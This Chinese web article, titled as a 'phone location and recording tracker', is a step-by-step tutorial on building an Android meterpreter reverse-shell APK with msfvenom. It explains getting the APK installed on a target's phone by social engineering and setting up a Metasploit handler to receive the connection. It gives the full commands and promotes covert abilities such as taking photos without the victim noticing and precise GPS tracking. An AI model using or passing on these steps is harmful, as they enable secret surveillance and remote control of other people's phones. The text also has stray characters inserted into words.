手机定位录音追踪器(放手机里的微型定位器)

35小吃技术网 推荐阅读 2023年06月23日11时09分28秒 201 0

手机定位录音追踪器(放手机里的微型定位器)MsfvenomKali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msf

手机定位录音追踪器(放手机里的微型定位器)

Msfvenom

Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。

比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfv网enom,接下来我们看看使用的方法。

手机定位录音追踪器(放手机里的微型定位器)-第1张图片


生成安卓远控

  • kali终端下输入:

msfvenom -h 查看使用帮助

其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)

msfvenom -l payloadsmsfvenom -l formats
  • 生成远控的完整命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk

这里没有使用-f参数,生成安卓可执行程序,可以不用。

  • 部署可执行程序

将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。

手机定位录音追踪器(放手机里的微型定位器)-第2张图片


使用metasploit进行监听

启动msf

Kali终端下输入:msfconsole

继续输入:

use exploit/multi/handler

本模块专门用于设置网独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。

为该模块设置参数:

show optionsset LHOST 192.168.31.111set lport 8888

这里的设置必须和前面用msfvenom的设置保持一致。

run执行侦听,等待上线
  • 得到meterpreter会话

一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。

输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:

远程拍照:目标手机不会有任何察觉,属于后台系统拍照网;

gps定位:直接显示经纬度地理位置,非常精准;